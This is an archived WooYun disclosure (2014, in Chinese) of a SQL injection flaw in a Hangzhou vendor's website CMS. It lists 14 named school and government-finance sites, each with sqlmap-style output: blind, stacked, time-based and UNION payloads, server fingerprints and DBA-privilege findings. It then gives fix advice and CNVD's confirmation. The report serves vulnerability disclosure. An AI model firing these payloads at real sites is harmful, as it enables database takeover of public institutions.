当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059967

漏洞标题:某软件公司程序存在通用型(DBA权限)SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-05-09 18:08

修复时间:2014-08-07 18:10

公开时间:2014-08-07 18:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-09: 细节已通知厂商并且等待厂商处理中
2014-05-12: 厂商已经确认,细节仅向厂商公开
2014-05-15: 细节向第三方安全合作伙伴开放
2014-07-06: 细节向核心白帽子及相关领域专家公开
2014-07-16: 细节向普通白帽子公开
2014-07-26: 细节向实习白帽子公开
2014-08-07: 细节向公众公开

简要描述:

乌云越来越给力了!预存了1万个通用List
感觉自己终于被得到认可,有同感的请点感谢!^ ^

详细说明:

技术支持:数域科技(杭州)有限公司
注入点:
1.index.aspx?pageGuid=
2.newsId=
存在问题的站点,(注意的是每个站点我只验证了一个,像pageGuid和newsId在多个页面出现的,你们修复要整站排查)。
手动排查波及10所学校+5个财政机构
1.http://www.hzdgxx.org/index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C
2.http://www.hzst.gov.cn/index.aspx?newsId=42993&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC
3.http://hzchzx.cn/index.aspx?pageGuid=505698AB-366C-4C59-B789-F0D342E39758&CatalogID=189
4.http://www.hzbjzg.org/index.aspx?newsId=10520&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
5.http://www.hzbwxx.com/index.aspx?newsId=10668&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
6.http://hzgxsy.net/index.aspx?pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C&NewsID=11402
7.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99
8.http://yuweishiny.13.dns222.net/index.aspx?pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5&ShopID=10
9.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99
10.http://www.hzxxsy.com/index.aspx?pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C&NewsID=6765
11.http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=243
12.http://60.191.18.37:8088/WebHall/NewsDatail.aspx?newsId=3593
13.http://218.75.32.196:8020/WebHall/NewsDatail.aspx?newsId=3567
14.http://60.191.17.52/WebHall/NewsDatail.aspx?newsId=3624
预警:
1.http://das.hhtz.gov.cn/archive/index.aspx?pageguid=349219E1-28BB-4849-BE72-2F05EAD8D5B5&CatalogID=742
2.http://www.bjsqxy.org/index.aspx?pageguid=E2859CC5-DFBC-4066-876B-2E2BA585FDBB

漏洞证明:

1.http://www.hzdgxx.org/index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C

Place: GET
Parameter: pageGuid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C' AND 2824=2824 AND 'VseI'='VseI
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True


2.http://www.hzst.gov.cn/index.aspx?newsId=42993&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC

Place: GET
Parameter: newsId
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: newsId=(SELECT CHAR(113)+CHAR(122)+CHAR(116)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (3158=3158) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(109)+CHAR(119)+CHAR(113))&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True


3.http://hzchzx.cn/index.aspx?pageGuid=505698AB-366C-4C59-B789-F0D342E39758&CatalogID=189

Place: GET
Parameter: pageGuid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageGuid=505698AB-366C-4C59-B789-F0D342E39758' AND 7519=7519 AND 'znbd'='znbd&CatalogID=189
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageGuid=505698AB-366C-4C59-B789-F0D342E39758'; WAITFOR DELAY '0:0:5'--&CatalogID=189
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageGuid=505698AB-366C-4C59-B789-F0D342E39758' WAITFOR DELAY '0:0:5'--&CatalogID=189
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True


4.http://www.hzbjzg.org/index.aspx?newsId=10520&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=10520 AND 9164=9164&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=10520; WAITFOR DELAY '0:0:5'--&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=10520 WAITFOR DELAY '0:0:5'--&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


5.http://www.hzbwxx.com/index.aspx?newsId=10668&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=10668 AND 2117=2117&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: newsId=10668 AND 1486=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1486=1486) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(109)+CHAR(113)))&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: newsId=10668 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113)+CHAR(106)+CHAR(108)+CHAR(76)+CHAR(82)+CHAR(112)+CHAR(69)+CHAR(78)+CHAR(73)+CHAR(72)+CHAR(80)+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- &CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: newsId=(SELECT CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8905=8905) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(109)+CHAR(113))&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


6.http://hzgxsy.net/index.aspx?pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C&NewsID=11402

Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C' AND 2193=2193 AND 'KyWu'='KyWu&NewsID=11402
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C'; WAITFOR DELAY '0:0:5'--&NewsID=11402
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C' WAITFOR DELAY '0:0:5'--&NewsID=11402
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


7.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99

Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' AND 6773=6773 AND 'wbkn'='wbkn
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008


8.http://yuweishiny.13.dns222.net/index.aspx?pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5&ShopID=10

---
Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5' AND 9381=9381 AND 'Vysz'='Vysz&ShopID=10
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5'; WAITFOR DELAY '0:0:5'--&ShopID=10
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5' WAITFOR DELAY '0:0:5'--&ShopID=10
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 0
back-end DBMS: Microsoft SQL Server 2005


9.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99

Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' AND 6773=6773 AND 'wbkn'='wbkn
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008


10.http://www.hzxxsy.com/index.aspx?pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C&NewsID=6765

Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C' AND 8213=8213 AND 'jZpr'='jZpr&NewsID=6765
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C'; WAITFOR DELAY '0:0:5'--&NewsID=6765
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C' WAITFOR DELAY '0:0:5'--&NewsID=6765
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


11.http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=243

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=243 AND 9303=9303
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: newsId=-2691 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(104)+CHAR(103)+CHAR(112)+CHAR(102)+CHAR(71)+CHAR(114)+CHAR(79)+CHAR(106)+CHAR(115)+CHAR(65)+CHAR(113)+CHAR(116)+CHAR(121)+CHAR(121)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=243; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=243 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


12.http://60.191.18.37:8088/WebHall/NewsDatail.aspx?newsId=3593

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=3593 AND 4569=4569
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: newsId=-4271 UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(110)+CHAR(98)+CHAR(113)+CHAR(101)+CHAR(69)+CHAR(107)+CHAR(113)+CHAR(74)+CHAR(118)+CHAR(98)+CHAR(78)+CHAR(71)+CHAR(113)+CHAR(113)+CHAR(119)+CHAR(105)+CHAR(119)+CHAR(113),NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=3593; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=3593 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


13.http://218.75.32.196:8020/WebHall/NewsDatail.aspx?newsId=3567

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=3567 AND 8900=8900
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: newsId=-6027 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(106)+CHAR(97)+CHAR(113)+CHAR(66)+CHAR(111)+CHAR(97)+CHAR(115)+CHAR(111)+CHAR(114)+CHAR(67)+CHAR(77)+CHAR(83)+CHAR(89)+CHAR(113)+CHAR(114)+CHAR(107)+CHAR(116)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=3567; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=3567 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


14.http://60.191.17.52/WebHall/NewsDatail.aspx?newsId=3624

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=3624 AND 8066=8066
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: newsId=-3498 UNION ALL SELECT NULL,CHAR(113)+CHAR(100)+CHAR(97)+CHAR(109)+CHAR(113)+CHAR(97)+CHAR(77)+CHAR(114)+CHAR(80)+CHAR(90)+CHAR(111)+CHAR(75)+CHAR(70)+CHAR(105)+CHAR(87)+CHAR(113)+CHAR(113)+CHAR(110)+CHAR(112)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=3624; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=3624 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

修复方案:

数字型参数newsId
修复方案为:在接收参数newsId时,对其进行强制整型转换即可。
以id参数为例,
int id= Integer.parseInt("id") ;//对id整型转换后再进行下一步的数据库查询更安全
字符型参数pageGuid
修复方案为:在接收参数pageGuid时,对其进行白名单限制。
例如,我先定pageGuid值只为我们设定的数组中的几个值,这个数组就是我们设定的白名单。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-05-12 18:50

厂商回复:

CNVD确认并复现所述情况,由CNVD通过公开联系渠道向软件生产厂商数域科技(杭州)有限公司处置。

最新状态:

暂无